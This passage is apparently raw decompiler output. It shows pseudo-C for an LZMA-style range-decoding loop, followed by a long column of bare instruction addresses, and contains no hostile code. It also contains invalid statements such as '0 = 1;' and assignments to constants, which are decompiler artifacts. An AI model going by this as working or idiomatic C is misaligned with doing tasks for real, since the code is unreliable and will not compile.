							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                                      0x00000000
                                                                      0x004062b8
                                                                      0x004062b8
                                                                      0x004062bd
                                                                      0x00406334
                                                                      0x0040633b
                                                                      0x00406345
                                                                      0x00406924
                                                                      0x00406924
                                                                      0x00406927
                                                                      0x00406927
                                                                      0x0040692d
                                                                      0x00406933
                                                                      0x00406939
                                                                      0x00406953
                                                                      0x00406956
                                                                      0x0040695c
                                                                      0x00406967
                                                                      0x00406969
                                                                      0x0040693b
                                                                      0x0040693b
                                                                      0x0040694a
                                                                      0x0040694e
                                                                      0x0040694e
                                                                      0x00406973
                                                                      0x0040699a
                                                                      0x0040699a
                                                                      0x004069a0
                                                                      0x004069a0
                                                                      0x00000000
                                                                      0x00406975
                                                                      0x00406975
                                                                      0x00406979
                                                                      0x00406b28
                                                                      0x00000000
                                                                      0x00406b28
                                                                      0x00406985
                                                                      0x0040698c
                                                                      0x00406994
                                                                      0x00406997
                                                                      0x00000000
                                                                      0x00406997
                                                                      0x004062bf
                                                                      0x004062bf
                                                                      0x004062c3
                                                                      0x004062cb
                                                                      0x004062ce
                                                                      0x004062d0
                                                                      0x004062d3
                                                                      0x004062d5
                                                                      0x004062da
                                                                      0x004062dd
                                                                      0x004062e4
                                                                      0x004062eb
                                                                      0x004062ee
                                                                      0x004062f9
                                                                      0x00406301
                                                                      0x00406301
                                                                      0x004062fb
                                                                      0x004062fb
                                                                      0x004062fb
                                                                      0x004062f0
                                                                      0x004062f0
                                                                      0x004062f0
                                                                      0x00406308
                                                                      0x00406326
                                                                      0x00406328
                                                                      0x004064fb
                                                                      0x004064fb
                                                                      0x004064fe
                                                                      0x00406501
                                                                      0x00406504
                                                                      0x00406507
                                                                      0x0040650a
                                                                      0x0040650d
                                                                      0x00406510
                                                                      0x00406513
                                                                      0x00406519
                                                                      0x00406531
                                                                      0x00406534
                                                                      0x00406537
                                                                      0x0040653a
                                                                      0x0040653a
                                                                      0x0040653d
                                                                      0x00406543
                                                                      0x0040651b
                                                                      0x0040651b
                                                                      0x00406523
                                                                      0x00406528
                                                                      0x0040652a
                                                                      0x0040652c
                                                                      0x0040652c
                                                                      0x0040654d
                                                                      0x00406550
                                                                      0x004064f3
                                                                      0x004064f9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406552
                                                                      0x004064ce
                                                                      0x004064d2
                                                                      0x00406ada
                                                                      0x00000000
                                                                      0x00406ada
                                                                      0x004064d8
                                                                      0x004064db
                                                                      0x004064de
                                                                      0x004064e2
                                                                      0x004064e5
                                                                      0x004064eb
                                                                      0x004064ed
                                                                      0x004064ed
                                                                      0x004064f0
                                                                      0x00000000
                                                                      0x004064f0
                                                                      0x0040630a
                                                                      0x0040630a
                                                                      0x0040630d
                                                                      0x00406313
                                                                      0x00406315
                                                                      0x00406315
                                                                      0x00406318
                                                                      0x0040631b
                                                                      0x0040631d
                                                                      0x0040631e
                                                                      0x00406321
                                                                      0x0040638e
                                                                      0x0040638e
                                                                      0x00406392
                                                                      0x00406395
                                                                      0x00406398
                                                                      0x0040639b
                                                                      0x0040639e
                                                                      0x0040639f
                                                                      0x004063a2
                                                                      0x004063a4
                                                                      0x004063aa
                                                                      0x004063ad
                                                                      0x004063b0
                                                                      0x004063b3
                                                                      0x004063b6
                                                                      0x004063bc
                                                                      0x004063d8
                                                                      0x004063db
                                                                      0x004063de
                                                                      0x004063e1
                                                                      0x004063e8
                                                                      0x004063ee
                                                                      0x004063f2
                                                                      0x004063be
                                                                      0x004063be
                                                                      0x004063c2
                                                                      0x004063ca
                                                                      0x004063cf
                                                                      0x004063d1
                                                                      0x004063d3
                                                                      0x004063d3
                                                                      0x004063fc
                                                                      0x004063ff
                                                                      0x00406376
                                                                      0x00406376
                                                                      0x0040637c
                                                                      0x0040642f
                                                                      0x00406435
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406437
                                                                      0x0040643a
                                                                      0x0040643d
                                                                      0x00406440
                                                                      0x00406443
                                                                      0x00406446
                                                                      0x00406449
                                                                      0x0040644c
                                                                      0x0040644f
                                                                      0x00406455
                                                                      0x0040646d
                                                                      0x00406470
                                                                      0x00406473
                                                                      0x00406476
                                                                      0x00406476
                                                                      0x00406479
                                                                      0x0040647f
                                                                      0x00406457
                                                                      0x00406457
                                                                      0x0040645f
                                                                      0x00406464
                                                                      0x00406466
                                                                      0x00406468
                                                                      0x00406468
                                                                      0x00406489
                                                                      0x0040648c
                                                                      0x0040640a
                                                                      0x0040640e
                                                                      0x00406ace
                                                                      0x00000000
                                                                      0x00406ace
                                                                      0x00406414
                                                                      0x00406417
                                                                      0x0040641a
                                                                      0x0040641e
                                                                      0x00406421
                                                                      0x00406427
                                                                      0x00406429
                                                                      0x00406429
                                                                      0x0040642c
                                                                      0x0040642c
                                                                      0x0040648c
                                                                      0x00406493
                                                                      0x00406493
                                                                      0x00406493
                                                                      0x00406497
                                                                      0x00406497
                                                                      0x0040649a
                                                                      0x0040649d
                                                                      0x004064a1
                                                                      0x00406ae6
                                                                      0x00000000
                                                                      0x00406ae6
                                                                      0x004064a7
                                                                      0x004064aa
                                                                      0x004064ad
                                                                      0x004064b0
                                                                      0x004064b3
                                                                      0x004064b6
                                                                      0x004064b9
                                                                      0x004064bb
                                                                      0x004064be
                                                                      0x004064c1
                                                                      0x004064c4
                                                                      0x004064c6
                                                                      0x004064c6
                                                                      0x004064c6
                                                                      0x00406663
                                                                      0x00406663
                                                                      0x00406666
                                                                      0x00406666
                                                                      0x00000000
                                                                      0x00406666
                                                                      0x00406388
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406405
                                                                      0x00406351
                                                                      0x00406355
                                                                      0x00406ac2
                                                                      0x00406b3e
                                                                      0x00406b46
                                                                      0x00406b4d
                                                                      0x00406b4f
                                                                      0x00406b56
                                                                      0x00406b5a
                                                                      0x00406b5a
                                                                      0x0040635b
                                                                      0x0040635e
                                                                      0x00406361
                                                                      0x00406365
                                                                      0x00406368
                                                                      0x0040636e
                                                                      0x00406370
                                                                      0x00406370
                                                                      0x00406373
                                                                      0x00000000
                                                                      0x00406373
                                                                      0x004063ff
                                                                      0x00406308
                                                                      0x0040613c
                                                                      0x0040613c
                                                                      0x00406145
                                                                      0x00406b53
                                                                      0x00406b53
                                                                      0x00000000
                                                                      0x00406b53
                                                                      0x0040614b
                                                                      0x00000000
                                                                      0x00406156
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040615f
                                                                      0x00406162
                                                                      0x00406165
                                                                      0x00406169
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040616f
                                                                      0x00406172
                                                                      0x00406174
                                                                      0x00406175
                                                                      0x00406178
                                                                      0x0040617a
                                                                      0x0040617b
                                                                      0x0040617d
                                                                      0x00406180
                                                                      0x00406185
                                                                      0x0040618a
                                                                      0x00406193
                                                                      0x004061a6
                                                                      0x004061a9
                                                                      0x004061b5
                                                                      0x004061dd
                                                                      0x004061df
                                                                      0x004061ed
                                                                      0x004061ed
                                                                      0x004061f1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004061e1
                                                                      0x004061e1
                                                                      0x004061e4
                                                                      0x004061e5
                                                                      0x004061e5
                                                                      0x00000000
                                                                      0x004061e1
                                                                      0x004061bb
                                                                      0x004061c0
                                                                      0x004061c0
                                                                      0x004061c9
                                                                      0x004061d1
                                                                      0x004061d4
                                                                      0x00000000
                                                                      0x004061da
                                                                      0x004061da
                                                                      0x00000000
                                                                      0x004061da
                                                                      0x00000000
                                                                      0x004061f7
                                                                      0x004061f7
                                                                      0x004061fb
                                                                      0x00406aa7
                                                                      0x00000000
                                                                      0x00406aa7
                                                                      0x00406204
                                                                      0x00406214
                                                                      0x00406217
                                                                      0x0040621a
                                                                      0x0040621a
                                                                      0x0040621a
                                                                      0x0040621d
                                                                      0x00406221
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406223
                                                                      0x00406229
                                                                      0x00406253
                                                                      0x00406259
                                                                      0x00406260
                                                                      0x00000000
                                                                      0x00406260
                                                                      0x0040622f
                                                                      0x00406232
                                                                      0x00406237
                                                                      0x00406237
                                                                      0x00406242
                                                                      0x0040624a
                                                                      0x0040624d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406292
                                                                      0x00406298
                                                                      0x0040629b
                                                                      0x004062a8
                                                                      0x004062b0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406267
                                                                      0x00406267
                                                                      0x0040626b
                                                                      0x00406ab6
                                                                      0x00000000
                                                                      0x00406ab6
                                                                      0x00406277
                                                                      0x00406282
                                                                      0x00406282
                                                                      0x00406282
                                                                      0x00406285
                                                                      0x00406288
                                                                      0x0040628b
                                                                      0x00406290
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406557
                                                                      0x0040655b
                                                                      0x00406579
                                                                      0x0040657c
                                                                      0x00406583
                                                                      0x00406586
                                                                      0x00406589
                                                                      0x0040658c
                                                                      0x0040658f
                                                                      0x00406592
                                                                      0x00406594
                                                                      0x0040659b
                                                                      0x0040659c
                                                                      0x0040659e
                                                                      0x004065a1
                                                                      0x004065a4
                                                                      0x004065a7
                                                                      0x004065a7
                                                                      0x004065ac
                                                                      0x00000000
                                                                      0x004065ac
                                                                      0x0040655d
                                                                      0x00406560
                                                                      0x00406563
                                                                      0x0040656d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004065c1
                                                                      0x004065c5
                                                                      0x004065e8
                                                                      0x004065eb
                                                                      0x004065ee
                                                                      0x004065f8
                                                                      0x004065c7
                                                                      0x004065c7
                                                                      0x004065ca
                                                                      0x004065cd
                                                                      0x004065d0
                                                                      0x004065dd
                                                                      0x004065e0
                                                                      0x004065e0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406604
                                                                      0x00406608
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040660e
                                                                      0x00406612
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406618
                                                                      0x0040661a
                                                                      0x0040661e
                                                                      0x0040661e
                                                                      0x00406621
                                                                      0x00406625
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406675
                                                                      0x00406679
                                                                      0x00406680
                                                                      0x00406683
                                                                      0x00406686
                                                                      0x00406690
                                                                      0x00000000
                                                                      0x00406690
                                                                      0x0040667b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040669c
                                                                      0x004066a0
                                                                      0x004066a7
                                                                      0x004066aa
                                                                      0x004066ad
                                                                      0x004066a2
                                                                      0x004066a2
                                                                      0x004066a2
                                                                      0x004066b0
                                                                      0x004066b3
                                                                      0x004066b6
                                                                      0x004066b6
                                                                      0x004066b9
                                                                      0x004066bc
                                                                      0x004066bf
                                                                      0x004066bf
                                                                      0x004066c2
                                                                      0x004066c9
                                                                      0x004066ce
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040675c
                                                                      0x0040675c
                                                                      0x00406760
                                                                      0x00406afe
                                                                      0x00000000
                                                                      0x00406afe
                                                                      0x00406766
                                                                      0x00406769
                                                                      0x0040676c
                                                                      0x00406770
                                                                      0x00406773
                                                                      0x00406779
                                                                      0x0040677b
                                                                      0x0040677b
                                                                      0x0040677b
                                                                      0x0040677e
                                                                      0x00406781
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004067df
                                                                      0x004067df
                                                                      0x004067e3
                                                                      0x00406b0a
                                                                      0x00000000
                                                                      0x00406b0a
                                                                      0x004067e9
                                                                      0x004067ec
                                                                      0x004067ef
                                                                      0x004067f3
                                                                      0x004067f6
                                                                      0x004067fc
                                                                      0x004067fe
                                                                      0x004067fe
                                                                      0x004067fe
                                                                      0x00406801
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004065af
                                                                      0x004065af
                                                                      0x004065b2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004068ee
                                                                      0x004068f2
                                                                      0x00406914
                                                                      0x00406917
                                                                      0x00406921
                                                                      0x00000000
                                                                      0x00406921
                                                                      0x004068f4
                                                                      0x004068f7
                                                                      0x004068fb
                                                                      0x004068fe
                                                                      0x004068fe
                                                                      0x00406901
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069ab
                                                                      0x004069af
                                                                      0x004069cd
                                                                      0x004069cd
                                                                      0x004069cd
                                                                      0x004069d4
                                                                      0x004069db
                                                                      0x004069e2
                                                                      0x004069e2
                                                                      0x00000000
                                                                      0x004069e2
                                                                      0x004069b1
                                                                      0x004069b4
                                                                      0x004069b7
                                                                      0x004069ba
                                                                      0x004069c1
                                                                      0x00406905
                                                                      0x00406905
                                                                      0x00406908
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406a9c
                                                                      0x00406a9f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004066d6
                                                                      0x004066d8
                                                                      0x004066df
                                                                      0x004066e0
                                                                      0x004066e2
                                                                      0x004066e5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004066ed
                                                                      0x004066f0
                                                                      0x004066f3
                                                                      0x004066f5
                                                                      0x004066f7
                                                                      0x004066f7
                                                                      0x004066f8
                                                                      0x004066fb
                                                                      0x00406702
                                                                      0x00406705
                                                                      0x00406713
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069e9
                                                                      0x004069e9
                                                                      0x004069ec
                                                                      0x004069f3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069f8
                                                                      0x004069f8
                                                                      0x004069fc
                                                                      0x00406b34
                                                                      0x00000000
                                                                      0x00406b34
                                                                      0x00406a02
                                                                      0x00406a05
                                                                      0x00406a08
                                                                      0x00406a0c
                                                                      0x00406a0f
                                                                      0x00406a15
                                                                      0x00406a17
                                                                      0x00406a17
                                                                      0x00406a17
                                                                      0x00406a1a
                                                                      0x00406a1d
                                                                      0x00406a1d
                                                                      0x00406a1d
                                                                      0x00406a1d
                                                                      0x00406a20
                                                                      0x00406a20
                                                                      0x00406a24
                                                                      0x00406a84
                                                                      0x00406a87
                                                                      0x00406a8c
                                                                      0x00406a8d
                                                                      0x00406a8f
                                                                      0x00406a91
                                                                      0x00406a94
                                                                      0x00000000
                                                                      0x00406a94
                                                                      0x00406a26
                                                                      0x00406a2c
                                                                      0x00406a2f
                                                                      0x00406a32
                                                                      0x00406a35
                                                                      0x00406a38
                                                                      0x00406a3b
                                                                      0x00406a3e
                                                                      0x00406a41
                                                                      0x00406a44
                                                                      0x00406a47
                                                                      0x00406a60
                                                                      0x00406a63
                                                                      0x00406a66
                                                                      0x00406a69
                                                                      0x00406a6d
                                                                      0x00406a6f
                                                                      0x00406a6f
                                                                      0x00406a70
                                                                      0x00406a73
                                                                      0x00406a49
                                                                      0x00406a49
                                                                      0x00406a51
                                                                      0x00406a56
                                                                      0x00406a58
                                                                      0x00406a5b
                                                                      0x00406a5b
                                                                      0x00406a76
                                                                      0x00406a7d
                                                                      0x00000000
                                                                      0x00406a7f
                                                                      0x00000000
                                                                      0x00406a7f
                                                                      0x00000000
                                                                      0x0040671b
                                                                      0x0040671e
                                                                      0x00406754
                                                                      0x00406884
                                                                      0x00406884
                                                                      0x00406884
                                                                      0x00406884
                                                                      0x00406887
                                                                      0x00406887
                                                                      0x0040688a
                                                                      0x0040688c
                                                                      0x00406b16
                                                                      0x00000000
                                                                      0x00406b16
                                                                      0x00406892
                                                                      0x00406895
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040689b
                                                                      0x0040689f
                                                                      0x004068a2
                                                                      0x004068a2
                                                                      0x004068a2
                                                                      0x00000000
                                                                      0x004068a2
                                                                      0x00406720
                                                                      0x00406722
                                                                      0x00406724
                                                                      0x00406726
                                                                      0x00406729
                                                                      0x0040672a
                                                                      0x0040672c
                                                                      0x0040672e
                                                                      0x00406731
                                                                      0x00406734
                                                                      0x0040674a
                                                                      0x0040674f
                                                                      0x00406787
                                                                      0x00406787
                                                                      0x0040678b
                                                                      0x004067b7
                                                                      0x004067b9
                                                                      0x004067c0
                                                                      0x004067c3
                                                                      0x004067c6
                                                                      0x004067c6
                                                                      0x004067cb
                                                                      0x004067cb
                                                                      0x004067cd
                                                                      0x004067d0
                                                                      0x004067d7
                                                                      0x004067da
                                                                      0x00406807
                                                                      0x00406807
                                                                      0x0040680a
                                                                      0x0040680d
                                                                      0x00406881
                                                                      0x00406881
                                                                      0x00406881
                                                                      0x00000000
                                                                      0x00406881
                                                                      0x0040680f
                                                                      0x00406815
                                                                      0x00406818
                                                                      0x0040681b
                                                                      0x0040681e
                                                                      0x00406821
                                                                      0x00406824
                                                                      0x00406827
                                                                      0x0040682a
                                                                      0x0040682d
                                                                      0x00406830
                                                                      0x00406849
                                                                      0x0040684b
                                                                      0x0040684e
                                                                      0x0040684f
                                                                      0x00406852
                                                                      0x00406854
                                                                      0x00406857
                                                                      0x00406859
                                                                      0x0040685b
                                                                      0x0040685e
                                                                      0x00406860
                                                                      0x00406863
                                                                      0x00406867
                                                                      0x00406869
                                                                      0x00406869
                                                                      0x0040686a
                                                                      0x0040686d
                                                                      0x00406870
                                                                      0x00406832
                                                                      0x00406832
                                                                      0x0040683a
                                                                      0x0040683f
                                                                      0x00406841
                                                                      0x00406844
                                                                      0x00406844
                                                                      0x00406873
                                                                      0x0040687a
                                                                      0x00406804
                                                                      0x00406804
                                                                      0x00406804
                                                                      0x00406804
                                                                      0x00000000
                                                                      0x0040687c
                                                                      0x00000000
                                                                      0x0040687c
                                                                      0x0040687a
                                                                      0x0040678d
                                                                      0x00406790
                                                                      0x00406792
                                                                      0x00406795
                                                                      0x00406798
                                                                      0x0040679b
                                                                      0x0040679d
                                                                      0x004067a0
                                                                      0x004067a3
                                                                      0x004067a3
                                                                      0x004067a6
                                                                      0x004067a6
                                                                      0x004067a9
                                                                      0x004067b0
                                                                      0x00406784
                                                                      0x00406784
                                                                      0x00406784
                                                                      0x00406784
                                                                      0x00000000
                                                                      0x004067b2
                                                                      0x00000000
                                                                      0x004067b2
                                                                      0x004067b0
                                                                      0x00406736
                                                                      0x00406739
                                                                      0x0040673b
                                                                      0x0040673e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406628
                                                                      0x00406628
                                                                      0x0040662c
                                                                      0x00406af2
                                                                      0x00000000
                                                                      0x00406af2
                                                                      0x00406632
                                                                      0x00406635
                                                                      0x00406638
                                                                      0x0040663b
                                                                      0x0040663d
                                                                      0x0040663d
                                                                      0x0040663d
                                                                      0x00406640
                                                                      0x00406643
                                                                      0x00406646
                                                                      0x00406649
                                                                      0x0040664c
                                                                      0x0040664f
                                                                      0x00406650
                                                                      0x00406652
                                                                      0x00406652
                                                                      0x00406652
                                                                      0x00406655
                                                                      0x00406658
                                                                      0x0040665b
                                                                      0x0040665e
                                                                      0x0040665e
                                                                      0x0040665e
                                                                      0x00406661
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004068a5
                                                                      0x004068a5
                                                                      0x004068a5
                                                                      0x004068a9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004068af
                                                                      0x004068b2
                                                                      0x004068b5
                                                                      0x004068b8
                                                                      0x004068ba
                                                                      0x004068ba
                                                                      0x004068ba
                                                                      0x004068bd
                                                                      0x004068c0
                                                                      0x004068c3
                                                                      0x004068c6
                                                                      0x004068c9
                                                                      0x004068cc
                                                                      0x004068cd
                                                                      0x004068cf
                                                                      0x004068cf
                                                                      0x004068cf
                                                                      0x004068d2
                                                                      0x004068d5
                                                                      0x004068d8
                                                                      0x004068db
                                                                      0x004068de
                                                                      0x004068e2
                                                                      0x004068e4
